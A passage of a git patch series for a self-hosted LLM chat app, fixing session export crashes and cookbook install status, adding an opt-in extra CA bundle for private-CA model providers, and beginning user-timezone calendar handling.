From 28c43121d70779ebe1e77c4f9e5fb9e8e2feef80 Mon Sep 17 00:00:00 2001
From: ghreprimand <github@jrpmail.ca>
Date: Thu, 4 Jun 2026 06:53:44 -0500
Subject: [PATCH 01/12] Fix session export 500 on multimodal/None message
 content (#1984)

txt/html/md export joined and string-munged message.content directly, so a
multimodal turn (content is a list of blocks) crashed export with a TypeError
on join (txt) / AttributeError on .replace (html); None content (tool-only
assistant turns) crashed txt/html the same way and rendered as the literal
'None' in md. Add a _content_to_text helper
that flattens string/list/None to plain text and apply it at the three export
sites. JSON export is unchanged (it serializes structured content correctly).
Plain-string content is returned unchanged, so existing exports are identical.

Co-authored-by: ghreprimand <203024559+ghreprimand@users.noreply.github.com>
---
 routes/session_routes.py                      | 26 ++++++++--
 .../test_session_export_nonstring_content.py  | 50 +++++++++++++++++++
 2 files changed, 73 insertions(+), 3 deletions(-)
 create mode 100644 tests/test_session_export_nonstring_content.py
diff --git a/routes/session_routes.py b/routes/session_routes.py
index 1b38e4b..58cb8ae 100644
--- a/routes/session_routes.py
+++ b/routes/session_routes.py
@@ -37,6 +37,26 @@ def _public_model(name: str, model: str) -> str:
     return model
 
 
+def _content_to_text(content) -> str:
+    """Flatten a message's content to plain text for text-based exports.
+
+    History entries carry three shapes: a plain string, a multimodal list of
+    content blocks (vision/image attachments), or None (assistant turns that
+    persisted only native tool_calls). The txt/html/md exporters join and
+    string-munge this value, so a list or None crashed txt (TypeError on join)
+    and html (AttributeError on .replace), and md rendered the raw repr/"None".
+    Keep only non-empty *string* "text" fields; anything else becomes "".
+    """
+    if isinstance(content, str):
+        return content
+    if isinstance(content, list):
+        return "\n".join(
+            b["text"] for b in content
+            if isinstance(b, dict) and isinstance(b.get("text"), str) and b["text"]
+        )
+    return ""
+
+
 def _verify_session_owner(request: Request, session_id: str, session_manager=None):
     """Verify the current user owns the session. Raises 404 if not.
 
@@ -708,7 +728,7 @@ def setup_session_routes(session_manager: SessionManager, config: dict, webhook_
             lines = []
             for m in session.history:
                 lines.append(f"[{m.role.upper()}]")
-                lines.append(m.content)
+                lines.append(_content_to_text(m.content))
                 lines.append("")
             out_name = filename or f"conversation_{safe_name}_{timestamp}.txt"
             return Response(
@@ -731,7 +751,7 @@ def setup_session_routes(session_manager: SessionManager, config: dict, webhook_
             ]
             for m in session.history:
                 cls = "user" if m.role == "user" else "ai"
-                content = m.content.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
+                content = _content_to_text(m.content).replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                 content = content.replace("\n", "<br>")
                 html_parts.append(f'<div class="msg {cls}"><div class="role">{m.role}</div>{content}</div>')
             html_parts.append("</body></html>")
@@ -750,7 +770,7 @@ def setup_session_routes(session_manager: SessionManager, config: dict, webhook_
         markdown_lines.append("\n---\n")
         for message in session.history:
             role = message.role.upper()
-            content = message.content
+            content = _content_to_text(message.content)
             markdown_lines.append(f"### {role}")
             markdown_lines.append(f"{content}\n")
             markdown_lines.append("---\n")
diff --git a/tests/test_session_export_nonstring_content.py b/tests/test_session_export_nonstring_content.py
new file mode 100644
index 0000000..07641ed
--- /dev/null
+++ b/tests/test_session_export_nonstring_content.py
@@ -0,0 +1,50 @@
+"""Regression: session export must tolerate non-string message content.
+
+A message's ``content`` is a plain string for normal turns, but a multimodal
+list of content blocks for image/vision turns, and ``None`` for assistant turns
+that persisted only native tool_calls. The txt/html/md exporters in
+``routes/session_routes.py`` joined and string-munged ``content`` directly, so:
+
+  - txt:  ``"\n".join([..., <list>, ...])``      -> TypeError
+  - html: ``<list>.replace("&", "&amp;")``        -> AttributeError
+  - md:   ``f"{<list>}"``                          -> raw Python repr in output
+
+``_content_to_text`` coerces all three shapes to plain text so export degrades
+gracefully instead of returning a 500.
+"""
+from routes.session_routes import _content_to_text
+
+
+def test_plain_string_passes_through_unchanged():
+    assert _content_to_text("hello world") == "hello world"
+    assert _content_to_text("") == ""
+
+
+def test_multimodal_list_flattens_to_its_text_blocks():
+    content = [
+        {"type": "text", "text": "describe this"},
+        {"type": "image_url", "image_url": {"url": "data:image/png;base64,AAAA"}},
+        {"type": "text", "text": "thanks"},
+    ]
+    assert _content_to_text(content) == "describe this\nthanks"
+
+
+def test_none_content_becomes_empty_string():
+    # Assistant turns carrying only native tool_calls persist content as None.
+    assert _content_to_text(None) == ""
+
+
+def test_list_without_text_blocks_is_empty_not_crash():
+    assert _content_to_text([{"type": "image_url", "image_url": {"url": "x"}}]) == ""
+    assert _content_to_text([]) == ""
+
+
+def test_coerced_output_survives_the_export_operations():
+    # The exact operations that previously crashed must now succeed.
+    history = ["plain", [{"type": "text", "text": "img turn"}], None]
+    texts = [_content_to_text(c) for c in history]
+    # txt export path
+    assert "\n".join(texts) == "plain\nimg turn\n"
+    # html export path
+    for t in texts:
+        assert isinstance(t.replace("&", "&amp;"), str)

From f876fc770432ef1a699358a37ba4691a7c558b3b Mon Sep 17 00:00:00 2001
From: SHORYA BAJ <110905262+bajshorya@users.noreply.github.com>
Date: Thu, 4 Jun 2026 17:25:06 +0530
Subject: [PATCH 02/12] fix(cookbook): don't mark successful dependency
 installs as crashed (#1315)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Pip dependency installs are tracked as download tasks but finish with the
runner's "=== Process exited with code 0 ===" sentinel and pip's
"Successfully installed" line — never the HuggingFace download markers
(DONE / 100% / /snapshots/ / DOWNLOAD_OK) the download heuristics look for.

Once the tmux pane is gone, the backend's only completion check is the HF
cache lookup, which a pip package (e.g. llama-cpp-python[server], no "/")
never matches, so it reports "stopped" — and the frontend maps a stopped
download to "crashed". The reconnect loop's session-gone heuristic had the
same gap. Result: a clean install (exit 0) showed "crashed" in the Running
tab while the Dependencies tab correctly showed it installed.

Add a shared _depInstallSucceeded() helper that keys off the exit-0
sentinel (falling back to pip's success line, rejecting ERROR/Traceback)
and wire it into both the session-gone heuristic and the background status
reconciler, gated on payload._dep so real model downloads are unaffected.

Also fixes the pre-existing test_background_status_poll_reconciles_into_local_tasks
assertion that no longer matched the evolved reconciler, and adds regression
coverage for both paths.
---
 static/js/cookbookRunning.js                  | 31 ++++++++++++++--
 ...okbook_dependency_completion_regression.py | 36 +++++++++++++++++++
 2 files changed, 65 insertions(+), 2 deletions(-)

diff --git a/static/js/cookbookRunning.js b/static/js/cookbookRunning.js
index 5f75a49..1f225b7 100644
--- a/static/js/cookbookRunning.js
+++ b/static/js/cookbookRunning.js
@@ -66,6 +66,23 @@ function _clearPillLabel(task) {
   return 'clear';
 }
 
+// A pip dependency/driver install (payload._dep) reports success with the
+// runner's "=== Process exited with code 0 ===" sentinel and pip's
+// "Successfully installed" line — never the HuggingFace download markers
+// (DONE / 100% / /snapshots/ / DOWNLOAD_OK) that the download heuristics look
+// for. Without this, a clean install whose tmux pane has already gone away is
+// misread as crashed/stopped even though pip exited 0. Prefer the authoritative
+// exit-code sentinel; with no sentinel, accept pip's "Successfully installed" /
+// "Requirement already satisfied" lines if the output shows no install error.
+function _depInstallSucceeded(output) {
+  const text = String(output || '');
+  if (!text) return false;
+  const exitMatch = text.match(/=== Process exited with code (-?\d+) ===/);
+  if (exitMatch) return Number(exitMatch[1]) === 0;
+  return /\b(?:Successfully installed|Requirement already satisfied)\b/.test(text)
+    && !/\bERROR\b|No matching distribution|Could not find a version|Traceback \(most recent call last\)/.test(text);
+}
+
 function _shouldOfferCrashReport(task) {
   if (!task) return false;
   if (task._unreachable && task.type === 'serve') return true;
@@ -2448,7 +2465,10 @@ async function _reconnectTask(el, task) {
           const downloadLooksSuccessful = !lastOutput.includes('DOWNLOAD_FAILED')
             && (lastOutput.includes('DONE') || lastOutput.includes('100%') || lastOutput.includes('/snapshots/') || lastOutput.includes('Download complete') || lastOutput.includes('DOWNLOAD_OK'));
           const serveLooksReady = task.type === 'serve' && _serveOutputLooksReady({ ...task, output: lastOutput });
-          const looksSuccessful = task.type === 'download' ? downloadLooksSuccessful : serveLooksReady;
+          // Dependency installs are tracked as download tasks but finish with a
+          // pip exit-0 sentinel, not HF download markers — so check that too.
+          const depInstallSucceeded = !!task.payload?._dep && _depInstallSucceeded(lastOutput);
+          const looksSuccessful = depInstallSucceeded || (task.type === 'download' ? downloadLooksSuccessful : serveLooksReady);
           if (!lastOutput.trim() || !looksSuccessful) {
             _updateTask(task.sessionId, { status: 'crashed' });
             el.dataset.status = 'crashed';
@@ -3309,11 +3329,18 @@ async function _pollBackgroundStatus() {
         const live = statusById.get(task.sessionId);
         if (!live) continue;
         const updates = {};
+        // A finished dependency install whose tmux pane is gone is reported
+        // "stopped" by the backend (its pip package is never in the HF cache the
+        // dead-session check inspects). Recover "done" from the retained output's
+        // exit-0 sentinel so a clean install isn't downgraded to crashed.
+        const depDone = !!task.payload?._dep && _depInstallSucceeded(task.output);
         const nextStatus = live.status === 'completed'
           ? 'done'
           : (live.status === 'error'
             ? 'error'
-            : (live.status === 'stopped' ? (task.type === 'download' ? 'crashed' : 'stopped') : null));
+            : (live.status === 'stopped'
+                ? (depDone ? 'done' : (task.type === 'download' ? 'crashed' : 'stopped'))
+                : null));
         if (nextStatus && task.status !== nextStatus) {
           updates.status = nextStatus;
           if (nextStatus === 'done' && task.payload?._dep) completedDeps.push(task);
diff --git a/tests/test_cookbook_dependency_completion_regression.py b/tests/test_cookbook_dependency_completion_regression.py
index b47e9b2..4c0ab59 100644
--- a/tests/test_cookbook_dependency_completion_regression.py
+++ b/tests/test_cookbook_dependency_completion_regression.py
@@ -37,6 +37,42 @@ def test_local_windows_session_commands_use_local_powershell_log_dir():
     assert ": `powershell -Command \"${ps}\"`;" in source
 
 
+def test_dep_install_success_recognized_from_exit_sentinel():
+    """A pip dependency install reports success via the runner's exit-0
+    sentinel / pip's "Successfully installed" line, not the HuggingFace
+    download markers. The shared helper must key off those, so an install
+    whose tmux pane is gone isn't misread as crashed."""
+    source = _read("static/js/cookbookRunning.js")
+
+    assert "function _depInstallSucceeded(output) {" in source
+    assert "=== Process exited with code" in source
+    assert "Successfully installed" in source
+
+
+def test_session_gone_heuristic_honors_dep_install_success():
+    """The reconnect loop's session-gone branch (download tasks need an HF
+    marker to look successful) must also accept a finished dependency install,
+    otherwise a clean pip install with no HF markers is marked crashed."""
+    source = _read("static/js/cookbookRunning.js")
+
+    assert "const depInstallSucceeded = !!task.payload?._dep && _depInstallSucceeded(lastOutput);" in source
+    assert (
+        "const looksSuccessful = depInstallSucceeded "
+        "|| (task.type === 'download' ? downloadLooksSuccessful : serveLooksReady);"
+    ) in source
+
+
+def test_background_poll_recovers_done_for_stopped_dependency_install():
+    """When the backend reports a finished dependency install as "stopped"
+    (its pip package is never in the HF cache the dead-session check inspects),
+    the reconciler must recover "done" from the retained output instead of
+    downgrading the card to crashed."""
+    source = _read("static/js/cookbookRunning.js")
+
+    assert "const depDone = !!task.payload?._dep && _depInstallSucceeded(task.output);" in source
+    assert "depDone ? 'done' : (task.type === 'download' ? 'crashed' : 'stopped')" in source
+
+
 def test_dependency_install_payload_keeps_env_path_for_refresh():
     source = _read("static/js/cookbook.js")
 

From f59edee6115b2a806bbe4357806eb14984701ac3 Mon Sep 17 00:00:00 2001
From: tanmayraut45 <tanmayraut0@gmail.com>
Date: Thu, 4 Jun 2026 17:48:50 +0530
Subject: [PATCH 03/12] Support extra CA bundle for private-CA LLM providers
 (#769)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adding GigaChat (Sber) or an on-premise enterprise LLM gateway as a
model endpoint fails on first probe with

    CERTIFICATE_VERIFY_FAILED: self-signed certificate in certificate
    chain (_ssl.c:1000)

because their TLS chain is signed by a private root CA (Russian Trusted
Root CA for GigaChat; corporate CA for on-prem) that isn't part of the
default system / certifi trust store. The endpoint shows offline in
the picker even though the URL and API key are correct (issue #722).

The right fix is to extend the trust store, not to weaken verification.
This change:

- src/tls_overrides.py: new module that resolves an opt-in env var
  LLM_CA_BUNDLE at import time, builds a shared SSLContext via
  ssl.create_default_context() (so the system / certifi bundle is
  loaded first) and layers the operator's PEM on top with
  load_verify_locations(). Exposes llm_verify() returning a value
  suitable for httpx `verify=`. Defaults to True (httpx built-in
  trust) when the env var is unset, when the file is missing, or
  when the PEM fails to load — verification is never silently
  disabled, the warning is logged and we fall back to the safe path.

- src/llm_core.py: thread llm_verify() into the shared AsyncClient
  used by stream_llm / streaming completions.

- routes/model_routes.py: thread llm_verify() into the five httpx.get
  call sites in _probe_endpoint / _ping_endpoint so adding a
  private-CA endpoint goes green on the very first probe and the
  picker stops showing it offline.

- .env.example: document LLM_CA_BUNDLE with the GigaChat case as the
  concrete example.

Deliberately NOT included: a verify=False knob (global or per-host).
Disabling verification exposes the affected endpoint to MITM, and the
operator-supplied bundle is the correct fix for legitimate private-CA
providers — so the only switch in this PR is the safe one.

Closes #722.
---
 .env.example                      |  10 ++
 routes/model_routes.py            |  11 ++-
 src/llm_core.py                   |   5 +-
 src/tls_overrides.py              |  91 ++++++++++++++++++
 tests/test_tls_overrides_scope.py | 149 ++++++++++++++++++++++++++++++
 5 files changed, 260 insertions(+), 6 deletions(-)
 create mode 100644 src/tls_overrides.py
 create mode 100644 tests/test_tls_overrides_scope.py

diff --git a/.env.example b/.env.example
index e53d2f8..f282880 100644
--- a/.env.example
+++ b/.env.example
@@ -27,6 +27,16 @@ LLM_HOST=localhost
 # Research service LLM endpoint
 # RESEARCH_LLM_ENDPOINT=http://localhost:8000/v1/chat/completions
 
+# Extra CA bundle for LLM providers whose TLS chain isn't in the default
+# trust store. Layered ON TOP of the system / certifi bundle — verification
+# stays on for every host, the trust set just gets larger. Useful for:
+#   - GigaChat / Sber (Russian Trusted Root CA): without this the endpoint
+#     shows offline with CERTIFICATE_VERIFY_FAILED — self-signed certificate
+#     in certificate chain.
+#   - On-premise / corporate LLM gateways with an internal CA.
+# Point at a PEM file containing the missing root(s).
+# LLM_CA_BUNDLE=/etc/odysseus/ca/extra-roots.pem
+
 # ============================================================
 # Search & Web
 # ============================================================
diff --git a/routes/model_routes.py b/routes/model_routes.py
index 0cf98d5..ac025ad 100644
--- a/routes/model_routes.py
+++ b/routes/model_routes.py
@@ -17,6 +17,7 @@ from fastapi.responses import StreamingResponse
 from core.database import SessionLocal, ModelEndpoint, Session as DbSession
 from core.middleware import require_admin
 from src.llm_core import _detect_provider, _host_match, ANTHROPIC_MODELS
+from src.tls_overrides import llm_verify
 from src.settings import load_settings as _load_settings, save_settings as _save_settings
 from src.endpoint_resolver import (
     normalize_base as _normalize_base,
@@ -624,7 +625,7 @@ def _probe_endpoint(base_url: str, api_key: str = None, timeout: int = 5) -> Lis
         if api_key:
             headers["x-api-key"] = api_key
         try:
-            r = httpx.get(url, headers=headers, timeout=timeout)
+            r = httpx.get(url, headers=headers, timeout=timeout, verify=llm_verify())
             r.raise_for_status()
             data = r.json()
             models = [m.get("id") for m in (data.get("data") or []) if m.get("id")]
@@ -645,7 +646,7 @@ def _probe_endpoint(base_url: str, api_key: str = None, timeout: int = 5) -> Lis
     url = build_models_url(base)
     headers = build_headers(api_key, base)
     try:
-        r = httpx.get(url, headers=headers, timeout=timeout)
+        r = httpx.get(url, headers=headers, timeout=timeout, verify=llm_verify())
         r.raise_for_status()
         data = r.json()
         # OpenAI format: {"data": [{"id": "model-name"}]}
@@ -680,7 +681,7 @@ def _probe_endpoint(base_url: str, api_key: str = None, timeout: int = 5) -> Lis
         parsed = urlparse(base)
         if parsed.port == 11434 or "ollama" in (parsed.hostname or "").lower():
             root = base[:-3].rstrip("/") if base.endswith("/v1") else base
-            r = httpx.get(root + "/api/tags", timeout=timeout)
+            r = httpx.get(root + "/api/tags", timeout=timeout, verify=llm_verify())
             r.raise_for_status()
             data = r.json()
             models = [m.get("name") or m.get("model") for m in (data.get("models") or []) if m.get("name") or m.get("model")]
@@ -741,7 +742,7 @@ def _ping_endpoint(base_url: str, api_key: str = None, timeout: float = 1.5) ->
                     break
             for path in ("/api/version", "/api/tags"):
                 try:
-                    r = httpx.get(root + path, timeout=timeout)
+                    r = httpx.get(root + path, timeout=timeout, verify=llm_verify())
                     result = _result_from_response(r)
                     if result["reachable"]:
                         return result
@@ -752,7 +753,7 @@ def _ping_endpoint(base_url: str, api_key: str = None, timeout: float = 1.5) ->
         pass
 
     try:
-        r = httpx.get(base, headers=headers, timeout=timeout)
+        r = httpx.get(base, headers=headers, timeout=timeout, verify=llm_verify())
         return _result_from_response(r)
     except Exception as e:
         last_error = str(e)[:120]
diff --git a/src/llm_core.py b/src/llm_core.py
index 2d66685..be31ac5 100644
--- a/src/llm_core.py
+++ b/src/llm_core.py
@@ -129,7 +129,10 @@ def _get_http_client() -> httpx.AsyncClient:
     """Return process-wide AsyncClient. Per-request timeout is passed at call time."""
     global _http_client
     if _http_client is None or _http_client.is_closed:
-        _http_client = httpx.AsyncClient(limits=_http_limits, http2=False)
+        from src.tls_overrides import llm_verify
+        _http_client = httpx.AsyncClient(
+            limits=_http_limits, http2=False, verify=llm_verify(),
+        )
     return _http_client
 
 def _get_cached_response(cache_key: str) -> Optional[str]:
diff --git a/src/tls_overrides.py b/src/tls_overrides.py
new file mode 100644
index 0000000..dc4e460
--- /dev/null
+++ b/src/tls_overrides.py
@@ -0,0 +1,91 @@
+"""Extended TLS trust store for private-CA LLM providers.
+
+Some upstream LLM providers serve their API over TLS certificates that are
+signed by a private root CA which is not part of the standard system bundle:
+
+  - GigaChat (Sber) uses the Russian Trusted Root CA, not bundled with
+    OpenSSL / certifi / system trust on most non-Russian installs. The
+    chain looks self-signed to Python and the endpoint is marked offline
+    with `CERTIFICATE_VERIFY_FAILED: self-signed certificate in
+    certificate chain` (see issue #722).
+  - On-premise enterprise LLM gateways often present a corporate CA that
+    has not been imported into the runtime's trust store.
+
+Operators point `LLM_CA_BUNDLE` at a PEM file containing the extra CA
+cert(s). The default system / certifi trust store is loaded first, then
+the operator's PEM is layered on top, so verification still happens —
+the trust set just gets larger. We deliberately do not provide a
+"verify=off" knob: weakening verification globally (or per-host) would
+expose those endpoints to MITM, and the operator-supplied bundle is the
+correct fix for legitimate private-CA providers.
+
+Example (GigaChat):
+    # Sber publishes the chain at
+    # https://www.gosuslugi.ru/crt/rootca_ssl_rsa2022.cer
+    # Convert to PEM and point the env var at it.
+    LLM_CA_BUNDLE=/etc/odysseus/ca/russian-trusted-root.pem
+
+Scope:
+    `llm_verify()` is intentionally consumed by only two modules — the
+    shared async client in `src/llm_core.py` and the endpoint probes in
+    `routes/model_routes.py`. Both reach LLM provider URLs. The override
+    is NOT threaded into web_fetch, search providers, gallery downloads,
+    embeddings, webhook delivery, or anything else that hits arbitrary
+    URLs, and it does NOT affect the app's own browser-facing TLS. That
+    boundary is pinned by `tests/test_tls_overrides_scope.py` — extending
+    it requires updating the allowlist there with a written justification.
+"""
+
+import logging
+import os
+import ssl
+from typing import Optional
+
+logger = logging.getLogger(__name__)
+
+
+_extra_bundle_path: Optional[str] = (os.environ.get("LLM_CA_BUNDLE") or "").strip() or None
+
+
+def _build_ssl_context() -> Optional[ssl.SSLContext]:
+    """Build an SSLContext that uses the default trust store and ALSO trusts
+    the operator-supplied PEM bundle. Returns None when no extra bundle is
+    configured, so callers fall through to httpx's default verify=True."""
+    if not _extra_bundle_path:
+        return None
+    if not os.path.isfile(_extra_bundle_path):
+        logger.warning(
+            "LLM_CA_BUNDLE points at %r but the file does not exist; "
+            "falling back to the default trust store.",
+            _extra_bundle_path,
+        )
+        return None
+    ctx = ssl.create_default_context()
+    try:
+        ctx.load_verify_locations(cafile=_extra_bundle_path)
+    except (ssl.SSLError, OSError) as e:
+        logger.warning(
+            "LLM_CA_BUNDLE=%r failed to load (%s); falling back to the "
+            "default trust store.",
+            _extra_bundle_path, e,
+        )
+        return None
+    logger.info(
+        "Loaded extra CA bundle %r on top of the default trust store.",
+        _extra_bundle_path,
+    )
+    return ctx
+
+
+# Resolved once at import time. The httpx clients in src/llm_core.py are
+# long-lived (process-wide), so editing LLM_CA_BUNDLE requires a restart —
+# matching the existing semantics of LLM_HOST, SEARXNG_INSTANCE, etc.
+_SHARED_SSL_CONTEXT: Optional[ssl.SSLContext] = _build_ssl_context()
+
+
+def llm_verify():
+    """Return the value to pass as `verify=` on httpx.get / httpx.Client /
+    httpx.AsyncClient. Returns the extended-trust SSLContext when
+    LLM_CA_BUNDLE is set and loaded; otherwise True (httpx default — system
+    / certifi bundle, verification fully on)."""
+    return _SHARED_SSL_CONTEXT if _SHARED_SSL_CONTEXT is not None else True
diff --git a/tests/test_tls_overrides_scope.py b/tests/test_tls_overrides_scope.py
new file mode 100644
index 0000000..e2ff114
--- /dev/null
+++ b/tests/test_tls_overrides_scope.py
@@ -0,0 +1,149 @@
+"""Scope tests for src/tls_overrides.
+
+#722 / PR #769 added an opt-in extra CA bundle (LLM_CA_BUNDLE) for
+private-CA LLM providers. The whole point is that the override stays
+SCOPED — it must extend trust for the intended outbound LLM provider
+requests only, and never:
+
+  - touch arbitrary URL fetching (web_fetch, document downloads, generic
+    httpx.get from any other module),
+  - touch browser-facing TLS (anything our app serves over HTTPS),
+  - weaken httpx's process-wide defaults,
+  - silently disable certificate verification.
+
+These tests prove that. They enumerate the call sites of `llm_verify()`
+in the source tree and assert they match an allowlist; they verify the
+override module itself never reaches for the well-known "skip TLS
+verification" knobs; and they pin the safe default (verify=True) when
+LLM_CA_BUNDLE is unset.
+
+If a future change threads `llm_verify()` into a non-LLM HTTP path, the
+first test fails and the contributor either has to justify the new
+caller (and add it to ALLOWED_CALLERS with a comment) or revert. That
+keeps the security-sensitive helper hard to misuse.
+"""
+
+from __future__ import annotations
+
+import os
+import re
+from pathlib import Path
+
+REPO = Path(__file__).resolve().parents[1]
+
+
+# Files that legitimately need llm_verify() applied to their outbound
+# httpx calls because the URL is an LLM provider's API. Every caller here
+# is a discrete LLM HTTP entry point and intentional. Any addition must
+# come with its own justification in code review.
+ALLOWED_CALLERS = frozenset({
+    "src/llm_core.py",          # shared AsyncClient used by stream_llm
+    "routes/model_routes.py",   # _probe_endpoint + _ping_endpoint
+})
+
+
+def _grep_files(pattern: str) -> set[str]:
+    """Return the set of repo-relative .py file paths whose body matches
+    `pattern`. Skips tests, the override module itself, and worktree
+    scratch dirs."""
+    rx = re.compile(pattern)
+    hits: set[str] = set()
+    for path in REPO.rglob("*.py"):
+        rel = path.relative_to(REPO).as_posix()
+        if rel.startswith("tests/"):
+            continue
+        if rel == "src/tls_overrides.py":  # definition site, not a caller
+            continue
+        if rel.startswith(".claude/") or "/.claude/" in rel:
+            continue
+        try:
+            body = path.read_text(encoding="utf-8", errors="ignore")
+        except OSError:
+            continue
+        if rx.search(body):
+            hits.add(rel)
+    return hits
+
+
+def test_llm_verify_only_used_in_allowlisted_files():
+    """llm_verify() must only be consumed by the LLM provider HTTP path.
+
+    The extra CA bundle is scoped to the two known LLM HTTP entry points.
+    If a future PR threads llm_verify() into web_fetch, search providers,
+    embeddings, gallery downloads, webhook delivery, or any other
+    arbitrary-URL caller, that's a scope expansion and a security review.
+    Adding a file to ALLOWED_CALLERS requires a written justification.
+    """
+    callers = _grep_files(r"\bllm_verify\s*\(")
+    unexpected = callers - ALLOWED_CALLERS
+    missing = ALLOWED_CALLERS - callers
+    assert not unexpected, (
+        f"llm_verify() called from unexpected file(s): {sorted(unexpected)}. "
+        f"Expected scope: {sorted(ALLOWED_CALLERS)}. If the new caller is an "
+        "LLM provider HTTP entry point, add it to ALLOWED_CALLERS with a "
+        "comment; if it's not, do not thread the extra CA bundle into it."
+    )
+    assert not missing, (
+        f"llm_verify() no longer called from {sorted(missing)} — the "
+        "extra CA bundle integration regressed or the allowlist is stale."
+    )
+
+
+def test_tls_overrides_does_not_weaken_global_tls():
+    """src/tls_overrides must never reach for a TLS-weakening knob.
+
+    Several common ways to silently weaken TLS in Python:
+      - ssl._create_default_https_context = ssl._create_unverified_context
+      - ssl._create_unverified_context (used as a default)
+      - urllib3.disable_warnings(...)
+      - httpx.AsyncClient(verify=False) (anywhere — must stay verify=True
+        or an SSLContext)
+      - requests.packages.urllib3.disable_warnings(...)
+
+    The override module must only EXTEND trust by loading an additional
+    bundle into an ssl.SSLContext built on top of the system default. It
+    must never silently disable verification.
+    """
+    body = (REPO / "src" / "tls_overrides.py").read_text(encoding="utf-8")
+    forbidden = [
+        r"_create_default_https_context\s*=",
+        r"_create_unverified_context",
+        r"disable_warnings",
+        r"verify\s*=\s*False",
+    ]
+    for pat in forbidden:
+        assert not re.search(pat, body), (
+            f"src/tls_overrides.py contains forbidden pattern {pat!r}. "
+            "The extra CA bundle must only ADD trust, never weaken it."
+        )
+
+
+def test_llm_verify_default_is_true_when_env_unset():
+    """When LLM_CA_BUNDLE is unset, llm_verify() must return True so httpx
+    falls through to its built-in trust store. This is the safe default —
+    operators have to opt in to get any change at all."""
+    import importlib
+    from unittest import mock
+    with mock.patch.dict(os.environ):  # env snapshot is restored on exit
+        os.environ.pop("LLM_CA_BUNDLE", None)
+        mod = importlib.reload(importlib.import_module("src.tls_overrides"))
+        assert mod.llm_verify() is True, (
+            f"Default llm_verify() must be True (httpx built-in trust store); "
+            f"got {mod.llm_verify()!r}. An accidental non-True default would "
+            "turn an opt-in extension into a process-wide change."
+        )
+
+
+def test_llm_verify_falls_back_to_true_for_missing_bundle_file():
+    """Pointing LLM_CA_BUNDLE at a non-existent path must NOT raise and
+    must fall back to verify=True (system trust). A misconfigured env var
+    on a deploy box should never produce a silently TLS-disabled process."""
+    import importlib
+    from unittest import mock
+
+    bogus = {"LLM_CA_BUNDLE": "/nonexistent/path/extra-roots.pem"}
+    # patch.dict restores the caller's value on exit instead of deleting it.
+    with mock.patch.dict(os.environ, bogus):
+        import src.tls_overrides as mod
+        importlib.reload(mod)
+        assert mod.llm_verify() is True

From 7b45a94b6d8469bafca10e655f56f10695301ce4 Mon Sep 17 00:00:00 2001
From: Alexander Kenley <alexanderkenley@gmail.com>
Date: Thu, 4 Jun 2026 22:20:04 +1000
Subject: [PATCH 04/12] Fix calendar routing and user-local time context (#408)

* fix(chat): add user-local time context

* fix(chat): route calendar follow-up phrasing

* refactor(chat): log tool intent routing reasons

* test(chat): align user time prompt shim

---------

Co-authored-by: Alex Kenley <Alex.Kenley@threatvectorsecurity.com>
---
 routes/calendar_routes.py    |  62 +++++++++-------
 routes/chat_routes.py        |  44 +++++++----
 src/action_intents.py        | 119 +++++++++++++++++++++---------
 src/agent_loop.py            |  25 +------
 src/chat_processor.py        |   9 +++
 src/tool_index.py            |   2 +-
 src/tool_schemas.py          |   2 +-
 src/user_time.py             | 138 +++++++++++++++++++++++++++++++++++
 static/js/calendar.js        |   3 +-
 static/js/chat.js            |  31 ++++++--
 tests/test_action_intents.py |  23 +++++-
 tests/test_user_time.py      | 111 ++++++++++++++++++++++++++++
 12 files changed, 463 insertions(+), 106 deletions(-)
 create mode 100644 src/user_time.py
 create mode 100644 tests/test_user_time.py

diff --git a/routes/calendar_routes.py b/routes/calendar_routes.py
index 4c79ce8..788a6ea 100644
--- a/routes/calendar_routes.py
+++ b/routes/calendar_routes.py
@@ -161,26 +161,18 @@ def _ensure_default_calendar(db, owner: str = None) -> CalendarCal:
     return cal
 
 
-# Per-request user UTC offset (in minutes east of UTC). chat_routes sets this
-# from the `X-Tz-Offset` header so naive natural-language times the LLM
-# emits ("today at 9pm") are parsed in the USER's timezone, not the server's
-# clock.  None = unknown, fall back to legacy server-local behavior.
-from contextvars import ContextVar
-_USER_TZ_OFFSET_MIN: ContextVar = ContextVar("user_tz_offset_min", default=None)
-
-
-def set_user_tz_offset(offset_min):
-    """Set the current user's UTC offset for this async context."""
-    try:
-        v = int(offset_min)
-    except (TypeError, ValueError):
-        return
-    _USER_TZ_OFFSET_MIN.set(v)
-
-
-def get_user_tz_offset():
-    """Read the current user's UTC offset (minutes east of UTC), or None."""
-    return _USER_TZ_OFFSET_MIN.get()
+# Per-request user time context. chat_routes sets this from browser timezone
+# headers so natural-language times the LLM emits ("today at 9pm") are parsed
+# in the user's timezone, not the server's clock. None = unknown, fall back to
+# legacy server-local behavior.
+from src.user_time import (
+    get_user_tz_name,
+    get_user_tz_offset,
+    now_user_local,
+    set_user_tz_name,
+    set_user_tz_offset,
+    user_timezone,
+)
 
 
 def parse_due_for_user(s: str) -> str:
@@ -199,6 +191,7 @@ def parse_due_for_user(s: str) -> str:
     """
     from datetime import timezone as _tz, timedelta as _td
     offset = get_user_tz_offset()
+    tz_name = get_user_tz_name()
     s = (s or "").strip()
     if not s:
         return s
@@ -212,11 +205,11 @@ def parse_due_for_user(s: str) -> str:
     except ValueError:
         parsed = None
 
-    if offset is None:
+    if offset is None and not tz_name:
         # No user tz known — preserve legacy behavior (naive server-local).
         return _parse_dt(s).isoformat()
 
-    user_tz = _tz(_td(minutes=offset))
+    user_tz = user_timezone()
 
     # Naive ISO → tag with user tz.
     if parsed is not None and parsed.tzinfo is None:
@@ -224,7 +217,7 @@ def parse_due_for_user(s: str) -> str:
 
     # Natural language — evaluate against user's "now".
     server_now_utc = datetime.now(_tz.utc)
-    user_now = server_now_utc.astimezone(user_tz)
+    user_now = now_user_local(server_now_utc)
     # Patch datetime.now() inside _parse_dt by leveraging the user's clock:
     # we re-implement the small natural-language phrases here against user_now
     # so the result is naturally in the user's tz.
@@ -232,6 +225,7 @@ def parse_due_for_user(s: str) -> str:
     lower = s.lower().strip()
 
     def _parse_time(t):
+        t = _re.sub(r'\b([ap])\s*\.?\s*m\b\.?', r'\1m', t.strip(), flags=_re.IGNORECASE)  # \b sits before the optional dot so "9 a.m." becomes "9 am", not "9 am."
